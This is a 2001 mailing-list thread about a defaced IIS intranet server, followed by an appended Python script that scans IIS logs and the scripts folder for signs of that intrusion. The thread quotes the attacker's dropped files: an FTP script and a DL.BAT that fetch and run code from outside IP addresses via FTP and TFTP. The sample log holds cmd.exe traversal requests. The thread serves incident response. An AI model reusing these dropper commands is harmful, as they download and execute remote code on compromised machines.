THIS IS A GREAT LIST. It really makes one feel that we are not alone when
trouble strikes.
I wanted to share some of my findings with the help of Ben, Razzak, Chuck, Mike,
Troy, Jeff and everyone else that responded to my post.
The IIS log file [in010505.log] reveals the attack came from IP
202.229.95.153. Indeed they used cmd.exe and root.exe on my NT server to do
their dirty deed.
NOTE: On my workstation browser I cannot get rid of the nasty page when I
re-log to my Intranet. Even if I reload or [F5], it fails to read the new
default.htm page I placed. This does not occur with Netscape. With Netscape
when I reload or [Ctrl]R it reads the new default.htm from my server eliminating
the nasty filthy page they used. I had to go into internet options and delete
all the internet temporary files before it properly reloaded.
Does anyone know why this would happen?
All I need is for a potential customer to have visited my Intranet default.htm
page and for the profanity to remain in their system forever!!
Ben, in my c:\inetpub\scripts\ directory there are a whole lot of
files besides the four you mentioned.
I have no idea if they were there before or not. Like an idiot I never made a
backup of this particular directory. Two of them are very suspicious.
ftpcmds.txt looks like a script file that goes something like:
---------------------------------------------
open 208.184.26.169.29292
user DL
DL
get 00.D
get 01.D
.
.
.
bye
----------------------------------------------
there was also a DL.BAT file with stuff like:
startDL:
tftp.exe -i 216.205.125.115 get DL.exe
ren 00.D install.bat
attrib tftp* -r
attrib DL.exe -r
del TFTP*
DEL DL.exe
install.bat %1 exit
-----------------------------------------------
Again I do not know if these files were there before the attack. If anyone knows
if they had files like these in their scripts directory, please let me know. For
now they have been deleted.
Although I feel this subject matter is very relevant to everyone on the list
server, it is limited to those using Tango with a server presence on the
Internet.
I will not continue to post concerning these issues. I will be happy to share
what I find if you contact me privately at [EMAIL PROTECTED]
THANKS AGAIN TO ALL WHO RESPONDED, and thank you Ben for your phone call; it was
most kind.
Manuel de Aguiar
Ben Johansen wrote:
> Hi Manuel,
>
> Just dealt with that myself last weekend, someone called china-boy. I have a
> love/hate feeling for this guy: I love him for bringing to light just how
> open MS leaves you, I hate him for doing it. All he did was write over the
> home page and I fixed it Sunday before anyone saw.
>
> Look in your Inetpub\scripts folder for any files that aren't supposed to be
> there. Most likely in your case the only files should be
>
> t3cgi.exe or t4cgi.exe
> t3iis.dll or t4iis.dll
>
> china-boy placed a file called "Hackercn.exe" there in mine.
>
> Also check the logs to learn how the hacker did it.
>
> Here is a link to a check-list that helped me learn just what is needed to
> get secure.
> http://www.microsoft.com/technet/security/iischk.asp
>
> Now I feel 100% better about security
>
> Ben Johansen
>
> -----Original Message-----
> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On
> Behalf Of Manuel de Aguiar
> Sent: Wednesday, May 09, 2001 1:19 PM
> To: [EMAIL PROTECTED]
> Subject: Security breach
>
> Hello Everyone,
>
> Someone broke into my intranet and replaced the default.htm with a page
> that displays an obscenity. They also replaced or installed default.asp
> with the same disgusting page.
> The new page has an email on it that could lead to this sick individual.
> Does anyone know if there are any government agencies that investigate
> this type of activity?
>
> Any information would be appreciated.
> Manuel
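The two checks discussed in this thread, pulling the attacker's requests out of the IIS log and comparing the Inetpub\scripts listing against the files Ben says belong there, as an added example that is not part of anyone's message above. The log lines, the IP addresses (documentation ranges, not the ones Manuel reported) and the directory listing are constructed; the expected-file set is the one Ben gives, and the log field layout is the IIS W3C extended format with a "#Fields:" header.

```python
import re

# Constructed sample in IIS W3C extended format (not a real log from the thread).
# Client addresses are from the RFC 5737 documentation ranges.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Server 4.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-05-09 13:10:01 192.0.2.10 GET /default.htm - 200
2001-05-09 13:12:44 192.0.2.10 GET /scripts/t3cgi.exe page=home 200
2001-05-09 13:15:07 198.51.100.7 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe /c+dir 200
2001-05-09 13:15:09 198.51.100.7 GET /scripts/root.exe /c+dir+/s 200
2001-05-09 13:16:30 192.0.2.10 GET /Default.htm - 200
"""

# The only files Ben expects in Inetpub\scripts on a Tango server (compared
# case-insensitively, since NTFS names are not case-sensitive).
EXPECTED_SCRIPTS = {"t3cgi.exe", "t4cgi.exe", "t3iis.dll", "t4iis.dll"}

# cmd.exe or root.exe anywhere in the requested path is the pattern Manuel
# found in his log; a legitimate Tango request never names either binary.
SUSPECT = re.compile(r"(cmd|root)\.exe", re.IGNORECASE)


def parse_w3c(lines):
    """Yield one dict per request line, keyed by the names in the #Fields header."""
    fields = None
    for raw in lines:
        line = raw.rstrip("\r\n")
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # header may repeat when IIS rolls the log
            continue
        if line.startswith("#") or fields is None:
            continue  # other directives, or data before any header
        values = line.split(" ", len(fields) - 1)
        if len(values) != len(fields):
            continue  # truncated or malformed line; skip rather than misalign fields
        yield dict(zip(fields, values))


def find_command_requests(lines):
    """Return (c-ip, cs-uri-stem, cs-uri-query, sc-status) for each suspect request."""
    hits = []
    for rec in parse_w3c(lines):
        stem = rec.get("cs-uri-stem", "")
        if SUSPECT.search(stem):
            hits.append((rec["c-ip"], stem,
                         rec.get("cs-uri-query", "-"), rec.get("sc-status", "-")))
    return hits


def attacker_ips(lines):
    """Distinct client addresses that issued a suspect request, sorted."""
    return sorted({hit[0] for hit in find_command_requests(lines)})


def unexpected_scripts(listing):
    """Names in the scripts directory that are not among the expected Tango files."""
    return sorted(name for name in listing if name.lower() not in EXPECTED_SCRIPTS)


if __name__ == "__main__":
    for ip, stem, query, status in find_command_requests(SAMPLE_LOG.splitlines()):
        print(f"{ip} {status} {stem} {query}")
    # Constructed listing of c:\inetpub\scripts after an incident like Manuel's.
    listing = ["t3cgi.exe", "T3IIS.DLL", "root.exe", "ftpcmds.txt", "DL.BAT"]
    print("unexpected:", unexpected_scripts(listing))
```

Run it against the real in010505.log by reading the file with `find_command_requests(open(path))`, and feed `unexpected_scripts` an `os.listdir` of the scripts directory; a file name in its output is the one to look at before deciding whether it was there before the break-in.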